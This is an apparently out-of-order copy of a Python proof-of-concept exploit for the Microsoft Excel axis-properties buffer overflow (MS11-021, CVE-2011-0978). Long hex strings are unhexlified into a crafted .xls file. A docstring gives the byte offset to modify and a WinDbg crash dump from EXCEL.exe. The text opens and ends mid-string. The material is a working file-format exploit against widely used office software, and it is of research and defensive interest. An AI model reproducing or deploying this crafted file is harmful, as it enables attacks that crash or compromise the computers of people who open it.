wD+="080210001c0000000200ff000000000000010f00080210001d0000000200ff0000000000000"
wD+="10f00080210001e0000000200ff000000000000010f00080210001f0000000200ff00000000"
wD+="0000010f00fd000a00000000000f002e000000fd000a00010000000f002d000000fd000a000"
wD+="10001000f002c000000fd000a00010003000f0032000000bd001200020000000f000000f03f"
wD+="0f00000049400100bd001200030000000f00000000400f00000045400100fd000a000300040"
wD+="00f002f000000bd001200040000000f00000008400f00000000400100060023000400040017"
wD+="004444444444844b4000002c0c37fd0d002502001f0001c001c042010500bd0012000500000"
wD+="00f00000010400f0000002a400100bd001200060000000f00000014400f00000050400100bd"
wD+="001200070000000f00000018400f00000052400100bd001200080000000f0000001c400f000"
wD+="08056400100fd000a00080004000f0030000000bd001200090000000f00000020400f000000"
wD+="5440010006002300090004000f0000000000000050400000040004ff0d002502001f0001c00"
wD+="1c04201e300bd0012000a0000000f00000022400f00000044400100bd0012000b0000000f00"
wD+="000024400f00008056400100bd0012000c0000000f00000026400f00000039400100bd00120"
wD+="00d0000000f00000028400f00000041400100fd000a000d0004000f0031000000bd0012000e"
wD+="0000000f0000002a400f0000c055400100060023000e0004000f00000000000000504000000"
wD+="90004fe0d006502001f0001c001c042014a01bd0012000f0000000f0000002c400f00004050"
wD+="400100bd001200100000000f0000002e400f00004053400100bd001200110000000f0000003"
wD+="0400f00008053400100bd001200120000000f00000031400f00000049400100bd0012001300"
wD+="00000f00000032400f00000000000100bd001200140000000f00000033400f0000005040010"
wD+="0bd001200150000000f00000034400f00008047400100bd001200160000000f00000035400f"
wD+="00000050400100bd001200170000000f00000036400f00000049400100bd001200180000000"
wD+="f00000037400f00004050400100bd001200190000000f00000038400f00000042400100bd00"
wD+="12001a0000000f00000039400f0000004c400100bd0012001b0000000f0000003a400f00000"
wD+="050400100bd0012001c0000000f0000003b400f0000c050400100bd0012001d0000000f0000"
wD+="003c400f00000037400100bd0012001e0000000f0000003d400f0000c052400100bd0012001"
wD+="f0000000f0000003e400f00004054400100d7004400eb0500006c020e002a00160024003d00"
wD+="16001600160024003d0016001600160024003d0016001600160016001600160016001600160"
wD+="01600160016001600160016001600c2010c0009000e000600090404000000ec00c8000f0002"
wD+="f036020000600008f00800000005000000051800000f0003f0060200000f0004f0280000000"
wD+="10009f0100000000000000000000000000000000000000002000af008000000001800000500"
wD+="00000f0004f078000000f2030af00800000005180000000a000093000bf0360000008000808"
wD+="d36018500010000008b0002000000bf0008000a004701933900004801e0eeffff8101410000"
wD+="08c001400000087f0300000c00000010f0120000000000020010020400b5000300600310009"
wD+="700000011f0000000005d001a00150012001e0005001160808d360158259201000000000000"
wD+="0000ec00080000000df000000000b6011200120200000000000000003f001000000000003c0"
wD+="0400000496e73657274206120636f7079206f662074686520646174612066726f6d206c6561"
wD+="737420746f20677265617465737420696e207468697320636f6c756d6e3c001000000000006"
wD+="00111003f00000000000000ec006c000f0004f06c000000a20c0af00800000001180000000a"
wD+="000073000bf02a0000008000d08d36018500010000008b0002000000bf0008000a0081010b0"
wD+="00008bf0110001000c00140000008000010f0120000000000050020020300e200080000000d"
wD+="00c400000011f0000000005d001a0015001200060001001160d08d360194269201000000000"
wD+="0000000ec00080000000df000000000b601120012020000000000000000e500100000000000"
wD+="3c00e60000416674657220796f752068617665207468652064657369726564206d65616e2c2"
wD+="06d656469616e20616e64206d6f646520706c65617365206c69737420746865206e756d6265"
wD+="727320696e206f7264657220746f2070726f766520746f206d6520796f75206861766520617"
wD+="2726976656420617420746865207269676874206d656469616e2e20204920776f756c642061"
wD+="6c736f206c696b6520796f7520746f2068696768746c6967687420746865206d6f646520627"
wD+="920636f6c6f72696e6720696e207468652063656c6c73207468617420636f6e7461696e2074"
wD+="6865206d6f64652e203c001000000000001b051100e500000000000000ec0066000f0004f06"
wD+="600000022060af00800000003180000000a000063000bf0240000008000208e36018b000200"
wD+="0000bf000800080081012e000008bf0110001000c00140000008000010f0120000000000020"
wD+="0b0020f005a00080070021400b500000011f0000000005d001a00150012001e000300116020"
wD+="8e3601782792010000000000000000ec00080000000df000000000b60112001202000000000"
wD+="0000000a1001000000000003c00a20000506c6561736520656e746572206120746578742062"
wD+="6f782068657265206578706c61696e2074686520737465707320696e766f6c76656420696e2"
wD+="066696e64696e6720746865206d65616e2c206d656469616e20616e64206d6f64652e202053"
wD+="6565206d7920646972656374696f6e73206f6e2066696e64696e6720746865206d65616e207"
wD+="46f2068656c7020796f75207769746820746865206f74686572732e3c00100000000000a603"
wD+="1100a100000000000000ec006c000f0004f06c000000720b0af00800000004180000000a000"
wD+="073000bf02a0000008000708e36018500010000008b0002000000bf0008000a0081010d0000"
wD+="08bf0110001000c00140000008000010f01200000000000200d00313002d000700b00321008"
wD+="800000011f0000000005d001a00150012001e0004001160708e360154289201000000000000"
wD+="0000ec00080000000df000000000b6011200120200000000000000005b001000000000003c0"
wD+="05c0000426f6e757320517565732e0a57726974652074686520737465707320666f72207468"
wD+="6520656173696573742077617920746f20617272616e67652074686520646174612066726f6"
wD+="d206c6561737420746f2067726561746573742e3c00100000001000be010f005b0000000000"
wD+="0000ec0018001f0005f010000000000017f00800000002000000051800003e021200b600000"
wD+="000004000000000000000000000001d000f00031b000c00000001001b001b000c0cef000600"
wD+="0500370000000a0000000908100000061000e228cd07c9c00000060200000b0214000000000"
wD+="0030000000d000000da800000dc8200000d00020001000c00020064000f0002000100110002"
wD+="00000010000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000"
wD+="100800008000000000000000000250204000000ff0081000200c10414000000150000008300"
wD+="02000000840002000000a10022000000ff000100010001000401000c0c0c000000000000e03"
wD+="f000000000000e03f207455000200080000020e00030000000d00000000000b000000080210"
wD+="00030000000b00ff000000000000010f0008021000040000000b00ff000000000000010f000"
wD+="8021000050000000b00ff000000000000010f0008021000060000000b00ff00000000000001"
wD+="0f0008021000070000000b00ff000000000000010f0008021000080000000b00ff000000000"
wD+="000010f00080210000c0000000b00ff000000000000010f00fd000a00030000000f00510000"
wD+="00fd000a00030002000f0057000000fd000a00030004000f002f000000fd000a00030005000"
wD+="f0032000000fd000a00030006000f0031000000fd000a00030007000f005c000000fd000a00"
wD+="030008000f005d000000fd000a00030009000f005e000000fd000a00040000000f005200000"
wD+="0fd000a00040002000f0058000000fd000a00050000000f0053000000fd000a00050002000f"
wD+="0059000000fd000a00060000000f0054000000fd000a00060002000f005a000000fd000a000"
wD+="70000000f0055000000fd000a00070002000f005b000000fd000a00080000000f0056000000"
wD+="fd000a000c0002000f0050000000fd000a000c0003000f005f000000fd000a000c0004000f0"
wD+="060000000fd000a000c0005000f0061000000fd000a000c0006000f0062000000fd000a000c"
wD+="0007000f0063000000fd000a000c0008000f0064000000fd000a000c000a000f0065000000d"
wD+="7001200ea010000780070001c001c001c001c000e003e021200b60000000000400000000000"
wD+="0000000000001d000f00030300020000000100030006000202ef0006000500370000000a000"
wD+="0000908100000061000e228cd07c9c00000060200000b021400000000000500000007000000"
wD+="e5830000cd8400000d00020001000c00020064000f000200010011000200000010000800fca"
wD+="9f1d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000"
wD+="0000000000250204000000ff0081000200c1041400000015000000830002000000840002000"
wD+="000a10022000000ff00010001000100040000020202000000000000e03f000000000000e03f"
wD+="207455000200080000020e00050000000700000002000900000008021000050002000900ff0"
wD+="00000000000010f0008021000060002000900ff000000000000010f00fd000a00050002000f"
wD+="003c000000fd000a00050003000f003d000000fd000a00050004000f002b000000fd000a000"
wD+="50005000f003e000000fd000a00050006000f003d000000fd000a00050007000f003f000000"
wD+="fd000a00050008000f0040000000fd000a00060002000f0041000000fd000a0006000300220"
wD+="042000000fd000a00060004000f003d000000fd000a00060005000f0043000000fd000a0006"
wD+="0006000f0044000000d7000800d0000000140062003e021200b600000000004000000000000"
wD+="000000000001d000f00030c000500000001000c000c000505ef000600050037000000670817"
wD+="00670800000000000000000000020001ffffffff004400000a0000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000000000000000000000000000000feff000005010200000000000000000000000000000"
wD+="0000001000000e0859ff2f94f6810ab9108002b27b3d930000000a800000007000000010000"
wD+="00400000000400000048000000080000006000000012000000700000000c000000880000000"
wD+="d0000009400000013000000a000000002000000e40400001e000000100000004d6172696520"
wD+="547265766973616e69001e0000000800000072696477616e00001e000000100000004d69637"
wD+="26f736f667420457863656c004000000080c44fcb9448c601400000008036c20bc0cacb0103"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="0000000000000000000000000000000000000000000000000feff0000050102000000000000"
wD+="00000000000000000000000100000002d5cdd59c2e1b10939708002b2cf9ae3000000028010"
wD+="0000900000001000000500000000f0000005800000017000000880000000b00000090000000"
wD+="100000009800000013000000a000000016000000a80000000d000000b00000000c000000050"
wD+="1000002000000e40400001e0000002800000054686520477265617465722047686574746f20"
wD+="466162756c6f757320466f756e646174696f6e000003000000d31a0a000b000000000000000"
wD+="b000000000000000b000000000000000b000000000000001e1000000800000004000000616c"
wD+="6c000300000063770003000000687700050000007175697a000500000074657374000500000"
wD+="073746174000a000000646576696174696f6e000a000000617667206772617068000c100000"
wD+="020000001e0000000b000000576f726b7368656574730003000000080000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000010000000"
wD+="2000000030000000400000005000000060000000700000008000000090000000a0000000b00"
wD+="00000c0000000d0000000e0000000f000000100000001100000012000000130000001400000"
wD+="015000000160000001700000018000000190000001a0000001b0000001c0000001d0000001e"
wD+="0000001f0000002000000021000000220000002300000024000000250000002600000027000"
wD+="00028000000290000002a0000002b0000002c0000002d0000002e0000002f00000030000000"
wD+="3100000032000000330000003400000035000000360000003700000038000000390000003a0"
wD+="000003b0000003c0000003d0000003e0000003f000000400000004100000042000000feffff"
wD+="ff4400000045000000460000004700000048000000490000004a000000feffffff4c0000004"
wD+="d0000004e0000004f000000500000005100000052000000fefffffffdfffffffeffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="ffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720"
wD+="079000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000000000000000016000501ffffffffffffffff020000002008020000000000c00000000"
wD+="000004600000000000000000000000000f9dd43b205cc01feffffff00000000000000005700"
wD+="6f0072006b0062006f006f006b0000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000012000201ffffffffffffffffff"
wD+="ffffff000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000002b850000000000000500530075006d006d0061007200790049006e0066006f00"
wD+="72006d006100740069006f006e0000000000000000000000000000000000000000000000000"
wD+="00000280002010100000003000000ffffffff00000000000000000000000000000000000000"
wD+="0000000000000000000000000000000000430000000010000000000000050044006f0063007"
wD+="5006d0065006e007400530075006d006d0061007200790049006e0066006f0072006d006100"
wD+="740069006f006e000000000000000000000038000201ffffffffffffffffffffffff0000000"
wD+="000000000000000000000000000000000000000000000000000000000000000004b00000000"
wD+="10000000000000"
FILE = open('webDEViL-CVE-2011-0978.xls',"wb")
backtobin=binascii.unhexlify(wD)
FILE.write(backtobin)
FILE.close()
webDEViL/Microsoft Office Excel Buffer Overflow ( na)
This is a PoC for MS11-021/CVE-2011-0978
Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow
w3bd3vil[at]gmail[dot].com
twitter.com/w3bd3vil
Modify bits at file location 0x39E7
0:000:x86> r
eax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554
eip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
2f36a2d5 33d2 xor edx,edx
2f36a2d7 53 push ebx
2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h]
2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx
2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch]
2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78)
2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx
2f36a2ed 56 push esi
2f36a2ee 57 push edi
2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95)
2f36a2f5 395514 cmp dword ptr [ebp+14h],edx
2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321)
2f36a2fa 8b4010 mov eax,dword ptr [eax+10h]
2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????
2f36a300 3bc2 cmp eax,edx
2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329)
2f36a304 0fb738 movzx edi,word ptr [eax]
2f36a307 8d4c3f02 lea ecx,[edi+edi+2]
2f36a30b 51 push ecx
eax here points to location in the file 0xFB4.
0:000:x86> dd eax
04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318
04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8
04dd63a0 04dd03e0 00000000 00000001 00000001
04dd63b0 00000001 00000001 00000001 00000001
04dd63c0 00000001 00000001 00000001 00000000
04dd63d0 00000000 00000000 00000000 00000000
04dd63e0 00000000 00000000 00000000 00000000
04dd63f0 00000000 00000000 00000000 00000000
0:000:x86> dd 0376ec80
0376ec80 00630009 0061006c 00730073 006f0077
0376ec90 006b0072 eaf10000 00770009 00720061
0376eca0 0075006d 00200070 00350023 eaf10000
0376ecb0 0283eb30 6666ce60 0283eb40 6666c960
0376ecc0 0283eb4c 6666c960 0000f80c 00000000
0376ecd0 00006338 00000000 00000001 00000000
0376ece0 0283eb98 6666ce60 0283eba4 6666c960
0376ecf0 0283ebb0 6666c960 00000000 00000000
webDEViL
"""
import binascii
wD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000"
wD+="000000000000001000000540000000000000000100000feffffff00000000feffffff000000"
wD+="0053000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffff0908100000060500e228cd07c9"
wD+="c0000006020000e1000200b004c10002000000e20000005c0070000800004e49492d54524c5"
wD+="420202020202020202020202020202020202020202020202020202020202020202020202020"
wD+="202020202020202020202020202020202020202020202020202020202020202020202020202"
wD+="0202020202020202020202020202020202020202020202020202042000200b0046101020000"
wD+="00c00100003d011000010002000300040005000600090008009c0002000e001900020000001"
wD+="20002000000130002000000af0102000000bc01020000003d001200e7fa2c013e2b2d1e3800"
wD+="00000000010058024000020000008d00020000002200020000000e0002000100b7010200000"
wD+="0da000200000031001a00c8000000ff7f9001000000000000050141007200690061006c0031"
wD+="001a00c8000000ff7f9001000000000000050141007200690061006c0031001a00c8000000f"
wD+="f7f9001000000000000050141007200690061006c0031001a00c8000000ff7f900100000000"
wD+="0000050141007200690061006c0031001a00a0000000ff7f900100000000000005014100720"
wD+="0690061006c0031001a00c80004000c009001000001000000050141007200690061006c0031"
wD+="001a00c800040024009001000001000000050141007200690061006c0031001c00a0000000f"
wD+="f7f900100000002000006015400610068006f006d00610031001a00dc000000ff7f90010000"
wD+="00020000050141007200690061006c0031001a009a010000ff7f90010000000000000501410"
wD+="07200690061006c0031001a009a010000ff7f9001000000000000050141007200690061006c"
wD+="0031001a0022010000ff7f9001000000020000050141007200690061006c0031001a00bd010"
wD+="000ff7f9001000000000000050141007200690061006c0031001a00bd010000ff7f90010000"
wD+="00000000050141007200690061006c0031001a00c80001000a00bc020000000200000501410"
wD+="07200690061006c0031001a00a0000000ff7f9001000000020000050141007200690061006c"
wD+="0031001a00c80000000a009001000000020000050141007200690061006c0031001a00c8000"
wD+="0000c009001000000020000050141007200690061006c0031001a00c8000100ff7fbc020000"
wD+="00020000050141007200690061006c0031001a00c80001000900bc020000000200000501410"
wD+="07200690061006c001e041c000500170000222422232c2323305f293b5c28222422232c2323"
wD+="305c291e04210006001c0000222422232c2323305f293b5b5265645d5c28222422232c23233"
